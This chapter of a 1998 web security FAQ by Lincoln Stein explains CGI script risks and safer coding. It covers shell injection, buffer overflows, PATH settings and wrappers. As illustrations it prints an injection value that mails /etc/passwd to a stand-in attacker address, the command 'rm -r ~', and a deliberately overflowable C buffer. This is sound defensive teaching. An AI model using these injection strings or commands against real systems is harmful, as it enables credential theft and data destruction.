Up to Table of Contents | ||
Back to Protecting Confidential Documents | Forward to Safe Scripting in Perl |
CGI scripts can present security holes in two ways:
CGI scripts are potential security holes even though you run your server as "nobody". A subverted CGI script running as "nobody" still has enough privileges to mail out the system password file, examine the network information maps, or launch a log-in session on a high numbered port (it just needs to execute a few commands in Perl to accomplish this). Even if your server runs in a chroot directory, a buggy CGI script can leak sufficient system information to compromise the host.
There's also a risk of a hacker managing to create a .cgi file somewhere in your document tree and then executing it remotely by requesting its URL. A cgi-bin directory with tightly-controlled access lessens the possibility of this happening.
First of all is the issue of the remote user's access to the script's source code. The more the hacker knows about how a script works, the more likely he is to find bugs to exploit. With a script written in a compiled language like C, you can compile it to binary form, place it in cgi-bin/, and not worry about intruders gaining access to the source code. However, with an interpreted script, the source code is always potentially available. Even though a properly-configured server will not return the source code to an executable script, there are many scenarios in which this can be bypassed.
Consider the following scenario. For convenience's sake, you've decided to identify CGI scripts to the server using the .cgi extension. Later on, you need to make a small change to an interpreted CGI script. You open it up with the Emacs text editor and modify the script. Unfortunately the edit leaves a backup copy of the script source code lying around in the document tree. Although the remote user can't obtain the source code by fetching the script itself, he can now obtain the backup copy by blindly requesting the URL:
http://your-site/a/path/your_script.cgi~(This is another good reason to limit CGI scripts to cgi-bin and to make sure that cgi-bin is separate from the document root.)
Of course in many cases the source code to a CGI script written in C is freely available on the Web, and the ability of hackers to steal the source code isn't an issue.
Another reason that compiled code may be safer than interpreted code is the size and complexity issue. Big software programs, such as shell and Perl interpreters, are likely to contain bugs. Some of these bugs may be security holes. They're there, but we just don't know about them.
A third consideration is that the scripting languages make it extremely easy to send data to system commands and capture their output. As explained below, the invocation of system commands from within scripts is one of the major potential security holes. In C, it's more effort to invoke a system command, so it's less likely that the programmer will do it. In particular, it's very difficult to write a shell script of any complexity that completely avoids dangerous constructions. Shell scripting languages are poor choices for anything more than trivial CGI programs.
All this being said, please understand that I am not guaranteeing that a compiled program will be safe. C programs can contain many exploitable bugs, as the net's experiences with NCSA httpd 1.3 and sendmail shows. Counterbalancing the problems with interpreted scripts is that they tend to be shorter and are therefore more easily understood by other people than the author. Furthermore, Perl contains a number of built-in features that were designed to catch potential security holes. For example, the taint checks (see below) catch many of the common pitfalls in CGI scripting, and may make Perl scripts safer in some respects than the equivalent C program.
You can never be sure that a script is safe. The best you can do is to examine it carefully and understand what it's doing and how it's doing it. If you don't understand the language the script's written in, show it to someone who does.
Things to think about when you examine a script:
Note that this bug only endangers your Web site if you have the search engine installed locally. It does not affect sites that link to Excite.com's search pages, or sites that are indexed by the Excite robot.
A worse problem is found in unpatched versions of EWS earlier than Feburary 1998 (unfortunately, also called version 1.1). This bug involves the failure to check user-supplied parameters before passing them to the shell, allowing remote users to execute shell commands on the server host. The commands will be executed with the privileges of the Web server.
See http://www.excite.com/navigate/patches.html for more information and patches.
To my eternal chagrin, one of the buggy CGI scripts to be discovered is in nph-publish, a script that I wrote myself to allow HTML documents to be "published" to the Apache web server from a publish-savvy editor such as Netscape Navigator Gold. I didn't check user-provided pathnames correctly, potentially allowing the script to write files into places where they aren't allowed. If the server is run with too many privileges, this can cause big problems. If you use this script, please upgrade to version 1.2 or higher. The bug was discovered by Randal Schwartz (merlyn@stonehenge.com).
The holes in the second two scripts on the list were discovered by
Paul Phillips (paulp@cerf.net),
who also wrote the CGI
security FAQ. The hole in the PHF (phone book) script was
discovered by Jennifer Myers
(jmyers@marigold.eecs.nwu.edu), and is representative of a
potential security hole in all CGI scripts that use NCSA's
util.c
library. Here's a
patch to fix the problem in util.c
.
Reports of other buggy scripts will be posted here on an intermittent basis.
In addition, one of the scripts given as an example of "good CGI scripting" in the published book "Build a Web Site" by net.Genesis and Devra Hall contains the classic error of passing an unchecked user variable to the shell. The script in question is in Section 11.4, "Basic Search Script Using Grep", page 443. Other scripts in this book may contain similar security holes.
This list is far from complete. No centralized authority is monitoring all the CGI scripts that are released to the public; the CERT does issue alerts about buggy CGI scripts when it learns about them, and it's a good idea to subscribe to their mailing list, or to browse the alert archive from time to time (see the bibliography).
Ultimately it's up to you to examine each script and make sure that it's not doing anything unsafe.
Although they can be used to create neat effects, scripts that leak system information are to be avoided. For example, the "finger" command often prints out the physical path to the fingered user's home directory and scripts that invoke finger leak this information (you really should disable the finger daemon entirely, preferably by removing it). The w command gives information about what programs local users are using. The ps command, in all its shapes and forms, gives would-be intruders valuable information on what daemons are running on your system.
A MAJOR source of security holes has been coding practices that allowed character buffers to overflow when reading in user input. Here's a simple example of the problem:
#include <stdlib.h>The problem here is that the author has made the assumption that user input provided by a POST request will never exceed the size of the static input buffer, 1024 bytes in this example. This is not good. A wily hacker can break this type of program by providing input many times that size. The buffer overflows and crashes the program; in some circumstances the crash can be exploited by the hacker to execute commands remotely.
#include <stdio.h> static char query_string[1024]; char* read_POST() {
int query_size; query_size=atoi(getenv("CONTENT_LENGTH")); fread(query_string,query_size,1,stdin); return query_string; }
Here's a simple version of the read_POST() function that avoids this problem by allocating the buffer dynamically. If there isn't enough memory to hold the input, it returns NULL:
char* read_POST() {Of course, once you've read in the data, you should continue to make sure your buffers don't overflow. Watch out for strcpy(), strcat() and other string functions that blindly copy strings until they reach the end. Use the strncpy() and strncat() calls instead.
int query_size=atoi(getenv("CONTENT_LENGTH")); char* query_string = (char*) malloc(query_size); if (query_string != NULL) fread(query_string,query_size,1,stdin); return query_string; }
#define MAXSTRINGLENGTH 255 char myString[MAXSTRINGLENGTH + sizeof('\0')]; char* query = read_POST(); assert(query != NULL); strncpy(myString,query,MAXSTRINGLENGTH); myString[MAXSTRINGLENGTH]='\0'; /* ensure string terminator */(Note that the semantics of strncpy are nasty when the input string is exactly MAXSTRINGLENGTH bytes long, leading to some necessary fiddling with the terminating NULL.)
In C this includes the popen(), and system() commands, all of which invoke a /bin/sh subshell to process the command. In Perl this includes system(), exec(), and piped open() functions as well as the eval() function for invoking the Perl interpreter itself. In the various shells, this includes the exec and eval commands.
Backtick quotes, available in shell interpreters and Perl for capturing the output of programs as text strings, are also dangerous.
The reason for this bit of paranoia is illustrated by the following bit of innocent-looking Perl code that tries to send mail to an address indicated in a fill-out form.
$mail_to = &get_name_from_input; # read the address from form open (MAIL,"| /usr/lib/sendmail $mail_to"); print MAIL "To: $mailto\nFrom: me\n\nHi there!\n"; close MAIL;The problem is in the piped open() call. The author has assumed that the contents of the $mail_to variable will always be an innocent e-mail address. But what if the wiley hacker passes an e-mail address that looks like this?
nobody@nowhere.com;mail badguys@hell.org</etc/passwd;Now the open() statement will evaluate the following command:
/usr/lib/sendmail nobody@nowhere.com; mail badguys@hell.org</etc/passwdUnintentionally, open() has mailed the contents of the system password file to the remote user, opening the host to password cracking attack.
$mailto = &get_name_from_input; # read the address from form open (MAIL,"| /usr/lib/sendmail -t -oi"); print MAIL <<END; To: $mailto From: me (me\@nowhere.com) Subject: nothing much Hi there! END close MAIL;C programmers can use the exec family of commands to pass arguments directly to programs rather than going through the shell. This can also be accomplished in Perl using the technique described below.
You should try to find ways not to open a shell. In the rare cases when you have no choice, you should always scan the arguments for shell metacharacters and remove them. The list of shell metacharacters is extensive:
&;`'\"|*?~<>^()[]{}$\n\rNotice that it contains the carriage return and newline characters, something that someone at NCSA forgot when he or she wrote the widely-distributed
util.c
library
as an example of CGI scripting in C.
It's a better policy to make sure that all user input arguments are exactly what you expect rather than blindly remove shell metacharacters and hope there aren't any unexpected side-effects. Even if you avoid the shell and pass user variables directly to a program, you can never be sure that they don't contain constructions that reveal holes in the programs you're calling.
For example, here's a way to make sure that the $mail_to address created by the user really does look like a valid address:
$mail_to = &get_name_from_input; # read the address from form unless ($mail_to =~ /^[\w.+-]+\@[\w.+-]+$/) { die 'Address not in form foo@nowhere.com'; }(This particular pattern match may be too restrictive for some sites. It doesn't allow UUCP-style addresses or any of the many alternative addressing schemes).
system("ls -l /local/web/foo");use this:
system("/bin/ls -l /local/web/foo");If you must rely on the PATH, set it yourself at the beginning of your CGI script:
putenv("PATH=/bin:/usr/bin:/usr/local/bin");
In general it's not a good idea to put the current directory (".") into the path.
Nothing can automatically make CGI scripts completely safe, but you can make them safer in some situations by placing them inside a CGI "wrapper" script. Wrappers may perform certain security checks on the script, change the ownership of the CGI process, or use the Unix chroot mechanism to place the script inside a restricted part of the file system.
There are a number of wrappers available for Unix systems:
cgiwrap allows you to put a wrapper around CGI scripts so that a user's scripts now run under his own user ID. This policy can be enforced so that users must use cgiwrap in order to execute CGI scripts. This simplifies administration and prevents users from interfering with each other.
However you should be aware that this type of wrapper does increase the risk to the individual user. Because his scripts now run with his own permissions, a subverted CGI script can trash his home directory by executing the command:
rm -r ~
Since the subverted CGI script has write access to the user's home directory, it could also place a trojan horse in the user's directory.
Another wrapper is sbox, written by the author. Like cgiwrap, it can run scripts as the CGI author's user and/or group. However, it takes additional steps to prevent CGI scripts from causing damage. For one thing, sbox optionally performs a chroot to a restricted directory, sealing the script off from the user's home directory and much of the rest of the file system. For another, you can use sbox to set resource allocation limitations on CGI scripts. This prevents certain denial-of-service attacks.
When running under the Unix version of Apache, sbox supports user-maintained directories and virtual hosts.
When restricting access to a script, remember to put the restrictions on the _script_ as well as any HTML forms that access it. It's easiest to remember this when the script is of the kind that generates its own form on the fly.
http://www.go2net.com/people/paulp/cgi-security/safe-cgi.txtThis document contains a great deal of useful advice, but has not been updated since September 1995. More recently, Selena Sol has published an excellent article on the risks of installing pre-built CGI scripts, with much helpful advice on configuring and customizing these scripts to increase their security. This article can be found at:
http://Stars.com/Authoring/Scripting/Security/An excellent all-round introduction to Perl and CGI Scripting can be found in the Perl CGI FAQ,
http://language.perl.com/CPAN/doc/FAQs/cgi/perl-cgi-faq.htmlwritten by Tom Christiansen (tchrist@perl.com) and Shishir Gundavaram (shishir@ora.com).
Up to Table of Contents | ||
Back to Protecting Confidential Documents | Forward to Safe Scripting in Perl |
Lincoln D. Stein (lstein@cshl.org)
Last modified: Sun Dec 20 13:23:15 MET 1998